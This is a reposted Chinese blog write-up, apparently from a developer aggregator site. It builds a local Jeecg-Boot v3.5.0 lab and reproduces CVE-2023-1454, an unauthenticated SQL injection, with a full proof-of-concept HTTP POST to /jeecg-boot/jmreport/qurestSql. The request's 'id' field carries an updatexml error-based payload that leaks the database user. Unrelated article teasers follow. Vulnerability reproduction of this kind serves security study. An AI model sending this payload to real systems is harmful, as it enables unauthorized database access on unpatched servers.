Jeecg-Boot 未授权SQL注入漏洞（CVE-2023-1454）

news2024/11/20 12:21:29

本文转载于：https://blog.csdn.net/qq_27536045/article/details/129944987

环境搭建

JDK: 1.8+ (小于11)

Maven: 3.5+

MySql: 5.7+

Redis: 3.2 +

Node Js: 10.0 +

Npm: 5.6.0+

Yarn: 1.21.1+

下载源码

后端源码

https://github.com/jeecgboot/jeecg-boot/tree/v3.5.0

前端源码

https://github.com/jeecgboot/jeecgboot-vue3

安装手册

http://doc.jeecg.com/2043871

下载完成后放在bc中。

JDK Maven 用 IDEA解决。

这里我用的是JAVA17，Maven 3.8 别忘了给Maven 换源。

数据库使用小P面板。

导入数据库

代码

source D:\bc\jeecg-boot\db\jeecgboot-mysql-5.7.sql

redis安装

https://github.com/MicrosoftArchive/redis/releases

代码

powershell

cd "C:\Program Files\Redis"

notepad.exe .\redis.windows.conf

redis-cli

shutdown

exit

redis-server redis.windows.conf

配置密码

配置后端项目：

redis配置

jeecg-boot\jeecg-module-system\jeecg-system-start\src\main\resources\application-dev.yml

mysql配置

启动后端项目

启动配置如下

启动完毕

前端安装

Nots js安装

https://www.runoob.com/nodejs/nodejs-install-setup.html

安装Yarn

代码

npm install yarn -g //全局安装

yarn --version // 查看版本

配置源

yarn config set registry https://registry.npm.taobao.org -g

yarn config set sass_binary_site https://npm.taobao.org/mirrors/node-sass/ -g

检查源

yarn config get registry // https://registry.npm.taobao.org

yarn config get sass_binary_site // https://npm.taobao.org/mirrors/node-sass/

检查前端配置

配置WebStorm

启动前端

右键package.json文件yarn install

依赖下载完毕启动

代码

>npm run serve

漏洞复现：

访问环境

该漏洞不需要鉴权可以直接利用。

注意这里是前后端分离的，前端为3100后端为8080

poc

代码

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1

Host: 192.168.1.3:8080

Content-Length: 131

Content-Type: application/json

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(0x23,(select current_user)),0x23)) or '%%' like '"}

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/562399.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

MongoDB安装教程—Ubuntu

MongoDB安装教程—Ubuntu

为啥用MongoDB，问就是客户要求。为啥用Ubuntu，问就是客户只有Ubuntu的机器。 0. 环境操作系统： Ubuntu 22.04.1 LTS (GNU/Linux 5.19.0-41-generic x86_64) 不同版本系统差异不同，其他版本系统未测试。 1. 安装 1.1 包管理公…

阅读更多...

深入探索SDL游戏开发

深入探索SDL游戏开发

前言欢迎来到小K的SDL专栏第二小节，本节将为大家带来基本窗口构成、渲染器、基本图形绘制、贴图、事件处理等的详细讲解，看完后希望对你有收获文章目录前言一、简单窗口二、渲染器三、基本图形绘制1、点2、线3、矩形4、圆和椭圆四、贴图五、事件处理…

阅读更多...

XR交互技术趋势：6DoF追踪、手势识别、眼动跟踪……

XR交互技术趋势：6DoF追踪、手势识别、眼动跟踪……

XR交互技术提供了用户与虚拟环境进行交互的方式和手段，而实时云渲染则提供了真三维、可交互、高沉浸的图形渲染和计算能力。结合这两者，用户可以通过XR设备获得更真实、更沉浸的虚拟体验，同时享受到优质的图形效果和流畅的交互响应。本篇文章…

阅读更多...

关于开发中对端口(port)的几点理解

关于开发中对端口(port)的几点理解

一、服务端的端口是固定的，客户端的端口是随机的客户端端口是随机的，比如访问百度，系统为浏览器分配了个端口1024。过一会重开电脑，访问了新浪，可能还是用1024端口，我不关浏览器，还要再开一个浏…

阅读更多...

CenterFusion数据处理函数__getitem__()解析

CenterFusion数据处理函数getitem()解析

CenterFusion数据处理函数__getitem__解析 1. 图像数据处理1.1 通过利用nuScence_COCO实例化对象获取图像以及相关数据的信息1.2 获取图像数据增强的相关参数：中心点c，尺度scale，旋转rotia和翻转flip1.3 根据生成的参数生成仿射矩阵来对图像进…

阅读更多...

spring boot 集成 swagger3

spring boot 集成 swagger3

Swagger 3是一种开源的API描述工具，它可以帮助开发人员设计、构建、文档化和测试API。Swagger 3支持多种编程语言和框架，包括Java、Node.js、Python、Ruby等，并提供了许多集成工具和插件，例如Postman、Apigee等。 Swagger 3使用Op…

阅读更多...

北京君正应用案例：双镜头双画面乔安枪球联动摄像头

北京君正应用案例：双镜头双画面乔安枪球联动摄像头

你是否遇到过这种问题？ 既要看店铺又要看柜台既要看车又要看大门雷龙发展提供原厂技术支持，并提供君正集成电路完整解决方案，大大降低你的开发难度及开发时间。单镜头摄像头一台不够广出现监控盲区，让小偷有可趁之机只能装两…

阅读更多...

sql语句---left join or right join

sql语句---left join or right join

1068. 产品销售分析 I 销售表 Sales： -------------------- | Column Name | Type | -------------------- | sale_id | int | | product_id | int | | year | int | | quantity | int | | price | int | -------------------- (s…

阅读更多...

JS文字转语音技术实现

JS文字转语音技术实现

前言最近在做排队叫号系统，涉及到文字转语音播报，因此总结了几种前端文字转语音发声的方法。一、Web Speech API h5新提供的一个原生语音识别技术的API，可以将文本转成语音并播放。作为官方的api，实现的效果是比较符合理想的…

阅读更多...

Windows平台下用例图中包含(include)、扩展(extend)和泛化(generalization）介绍

Windows平台下用例图中包含(include)、扩展(extend)和泛化(generalization）介绍

我是荔园微风，作为一名在IT界整整25年的老兵，今天总结一下Windows平台下用例图中包含(include)、扩展(extend)和泛化(generalization）介绍。用例图是解决用户需求的图，画好用例图一定要理清用例之间的关系。用例之间有三种关系&…

阅读更多...

LabVIEWCompactRIO 开发指南33 测试和调试LabVIEW FPGA代码

LabVIEWCompactRIO 开发指南33 测试和调试LabVIEW FPGA代码

LabVIEWCompactRIO 开发指南33 测试和调试LabVIEW FPGA代码如前所述，应在仿真模式下开发LabVIEWFPGA VI，以快速迭代设计并避免冗长的编译时间。当需要测试和调试VI时，可以保持仿真模式或利用其他几个选项。应该根据功能验证与性能的要求以…

阅读更多...

【LeetCode】复制带随机指针的链表

【LeetCode】复制带随机指针的链表

Leetcode 138.复制带随机指针的链表文章目录题目描述解题思路运行代码题目描述给你一个长度为 n 的链表，每个节点包含一个额外增加的随机指针 random ，该指针可以指向链表中的任何节点或空节点。构造这个链表的深拷贝。深拷贝应该正好由 n 个全…

阅读更多...

C语言中这么骚的退出程序方式你知道几个？

C语言中这么骚的退出程序方式你知道几个？

前言在本篇文章当中主要给大家介绍C语言当中一些不常用的特性，比如在main函数之前和之后设置我们想要执行的函数，以及各种花式退出程序的方式。 1、main函数是最先执行和最后执行的函数吗？ 1）C语言构造和析构函数通常我们在…

阅读更多...

Python数据分析案例27——PCA-K均值-轮廓系数客户聚类

Python数据分析案例27——PCA-K均值-轮廓系数客户聚类

本案例适合应用统计，数据科学，电商专业 K均值对客户进行分类的案例都做烂了......但我认为这个案例还是有一定的价值的，使用了pca，还有轮廓系数寻找最优的聚类个数。下面来看看代码准备导入包 import numpy as np import pa…

阅读更多...

网上学影视后期靠谱吗影视后期剪辑需要学什么

网上学影视后期靠谱吗影视后期剪辑需要学什么

影视后期如果有人手把手当面教的话，当然是最好的。但很多人都没有这么好的条件，实际上，网上也有很多教程可以学习利用。不过，小伙伴们可能会有疑问，网上学影视后期靠谱吗，影视后期剪辑需要学什么&#xff1…

阅读更多...

从创意造型到高品质曲面的卓越体验｜CATIA ICEM Design Experience

从创意造型到高品质曲面的卓越体验｜CATIA ICEM Design Experience

目录 IDX为设计师提供了强大直观的建模工具 IDX为曲面工程师提供高品质数字模型处理能力 IDX与其他工具配合形成完整的数字化解决方案建模是设计工作的重要环节，合适的数字模型能够在各个环节对整个设计流程产生正面的推动作用。设计的不同阶段对模型有各自的…

阅读更多...

Azkaban从入门到精通以及案例实操系列

Azkaban从入门到精通以及案例实操系列

1、Azkaban概论 1.1、Azkaban简介 Azkaban 是一个开源的基于 Web 的工作流调度系统，由 LinkedIn 公司开发并维护。它可以帮助用户在大规模数据处理中来管理和调度作业，提供了简单易用、高效可靠的工作流设计和调度功能。 Azkaban 的主要特点包括&…

阅读更多...

亿发ERP系统，全链条采购协同管理数智化平台，中小企业采购业务全流程管理

亿发ERP系统，全链条采购协同管理数智化平台，中小企业采购业务全流程管理

在数字时代，中小型企业在采购管理方面面临多项挑战。集采管理难：由于资源和专业知识有限，中小企业通常难以建立集中采购职能，无法有效简化整个组织的采购活动。这一挑战包括定义采购政策、标准化程序和实施高效的采购系统。信…

阅读更多...

『赠书活动｜第六期』《“Java四大名著“，你集齐了吗？》

『赠书活动｜第六期』《“Java四大名著“，你集齐了吗？》

💗wei_shuo的个人主页 💫wei_shuo的学习社区 🌐Hello World ！ 『赠书活动 ｜ 第六期』本期书籍：《“Java四大名著”，你集齐了吗？》赠书规则：评论区：点赞&…

阅读更多...

供水管网监测系统，供水管网压力监测系统

供水管网监测系统，供水管网压力监测系统

水是城市赖以生存的血脉，直接关系到居民、企业和公共设施的正常生活和生产。然而，城市供水管网的高效运行面临着一系列挑战，如管道老化、泄漏和不均衡的供水压力等。目前城市供水管网泄漏检测排查采用人工巡检、人工听漏的方式，巡…

阅读更多...

推荐文章

最新文章